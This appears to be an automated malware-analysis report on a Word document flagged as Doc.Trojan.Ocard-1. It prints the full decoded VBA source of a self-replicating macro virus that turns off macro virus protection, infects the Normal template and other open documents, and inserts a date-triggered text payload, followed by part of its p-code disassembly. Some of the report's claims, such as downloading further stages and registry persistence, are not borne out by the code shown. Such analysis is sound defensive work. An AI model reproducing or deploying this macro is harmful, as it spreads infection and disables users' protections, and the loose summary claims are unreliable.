Verdict: MALICIOUS
Risk score: 140

Malware insights (MITRE ATT&CK):
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. The macros are designed to modify the Normal.dot template, which is a common technique for establishing persistence or downloading further stages. The ClamAV detection 'Doc.Trojan.Ocard-1' further supports its malicious nature. The specific intent of the macro is to copy its own code into the Normal.dot template, potentially to ensure execution on subsequent document openings.
Heuristics (2)
- ClamAV: Doc.Trojan.Ocard-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Ocard-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8556 bytes | 7afdf360ac4a2562430df6ea6dd1f2b21b8e902ff08c82bf280137780f5b3fd1 | ClamAV: Doc.Trojan.Ocard-1; obfuscation or payload: unlikely |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Draco Malfoy
Dim a As Document, t As Template
Dim beak As Double, str As String
Dim i, salmon As Integer
On Error Resume Next
Set a = ActiveDocument
Set t = NormalTemplate
'Coups -39
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If Left(a.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 6) = "'Draco" Then
salmon = vbOK
End If
If Left(t.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 6) = "'Draco" Then
salmon = salmon + vbCritical
End If
Select Case salmon
Case vbOK
str = a.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With t.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString str
beak = Val(Mid(.Lines(9, 1), 7, Len(.Lines(9, 1)))) + 1
.ReplaceLine 9, "'Coups " & beak
If beak Mod 2 Then
.ReplaceLine 1, Left(.Lines(1, 1), 21) & "Close()"
Else
.ReplaceLine 1, Left(.Lines(1, 1), 21) & "Open()"
End If
End With
Case vbCritical
str = t.VBProject.VBComponents.Item(1).CodeModule.Lines(1, t.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With a.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString str
End With
Case vbByte
str = a.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
For i = 1 To Word.Windows.Count
With Word.Windows.Item(i).Document.VBProject.VBComponents.Item(1).CodeModule
If Left(.Lines(2, 1), 6) <> "'Draco" Then
.DeleteLines 1, .CountOfLines
.AddFromString str
End If
End With
Word.Windows.Item(i).Document.Save
Next i
End Select
If Month(Now) = 5 And Day(Now) = 5 Then
If Right(a.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1), 7) = "Close()" Then
Selection.TypeText "Is it not a Camel ? "
a.Save
End If
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/4ccff53e553e4422bbbb6f8b3cc28e39.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4154 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' QuoteRem 0x0000 0x000C "Draco Malfoy"
' Line #2:
' Dim
' VarDefn a (As Document)
' VarDefn t (As Template)
' Line #3:
' Dim
' VarDefn beak (As Double)
' VarDefn str (As String)
' Line #4:
' Dim
' VarDefn i
' VarDefn salmon (As Integer)
' Line #5:
' OnError (Resume Next)
' Line #6:
' SetStmt
' Ld ActiveDocument
' Set a
' Line #7:
' SetStmt
' Ld NormalTemplate
' Set t
' Line #8:
' QuoteRem 0x0000 0x0009 "Coups -39"
' Line #9:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #10:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #11:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #12:
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' Ld a
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0006
' ArgsLd LBound 0x0002
' LitStr 0x0006 "'Draco"
' Eq
' IfBlock
' Line #13:
' Ld vbOK
' St salmon
' Line #14:
' EndIfBlock
' Line #15:
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' Ld t
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0006
' ArgsLd LBound 0x0002
' LitStr 0x0006 "'Draco"
' Eq
' IfBlock
' Line #16:
' Ld salmon
' Ld vbCritical
' Add
' St salmon
' Line #17:
' E
```

... (truncated)